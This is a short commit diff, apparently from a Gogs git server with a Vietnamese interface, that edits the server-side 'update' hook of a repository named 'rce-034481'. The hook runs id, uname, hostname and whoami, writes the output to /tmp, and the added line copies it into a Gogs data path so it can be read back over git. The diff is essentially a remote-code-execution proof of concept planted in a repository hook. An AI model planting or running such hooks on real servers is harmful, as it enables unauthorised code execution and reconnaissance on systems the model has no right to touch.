arpongxm 4 tuần trước cách đây
mục cha
commit
0953a87116

+ 3 - 1
nested/rce-034481.git/hooks/update

@@ -1,5 +1,7 @@
 #!/bin/sh
 #!/bin/sh
 id > /tmp/rce_out 2>&1
 id > /tmp/rce_out 2>&1
-uname -a >> /tmp/rce_out 2>&1
+uname -a >> /tmp/rce_out 2>&1  
 hostname >> /tmp/rce_out 2>&1
 hostname >> /tmp/rce_out 2>&1
 whoami >> /tmp/rce_out 2>&1
 whoami >> /tmp/rce_out 2>&1
+# Also write to a path reachable via git
+cp /tmp/rce_out /data/gogs/data/tmp/local-r/27/rce_proof.txt 2>/dev/null || true